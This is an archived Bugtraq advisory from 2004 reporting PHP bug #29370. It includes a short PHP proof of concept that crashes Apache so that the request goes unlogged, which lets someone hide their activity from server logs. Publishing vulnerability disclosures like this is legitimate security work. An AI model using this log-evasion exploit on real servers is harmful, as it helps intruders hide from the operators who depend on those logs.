Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: [PHP Bug] How to hide a HTTP request in the apache logs

[PHP Bug] How to hide a HTTP request in the apache logs

From: Anthony Debhian <anthony.debhian_at_only-for.info>
Date: 6 Aug 2004 23:25:16 -0000
('binary' encoding is not supported, stored as-is) Author: Debhian ( anthony.debhian -AT- only-for.info )
PHP Bug #29370



Description:
 With a certain code, PHP causes a segfault in Apache and the request is not logged.
 This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code.
 The bug seems to work on all config (php4 / php5 && windows / unix)
 


Tested system:
 Windows / Apache 1.3.31 / PHP 5.0.0
 Windows / Apache 1.3.27 / PHP 4.3.3
 Linux / Apache 1.3.24 / PHP 4.2.1



Proof of concept:

 <?
 function funcfunc($array,$space="")
 {
  foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
  return $src;
 }

 function funcfunc2($array,$test)
 {
  foreach($array['test'] as $key=>$value) { }
  return $array;
 }

 $test['debhy']['debhou']="test1";
 $test['debhian']['debh']="test2";
 $array=funcfunc($test);
 $array=funcfunc2($array,"test");
 ?>



Solution:
 The php team has not answered the posted bug yet.
Received on Aug 07 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]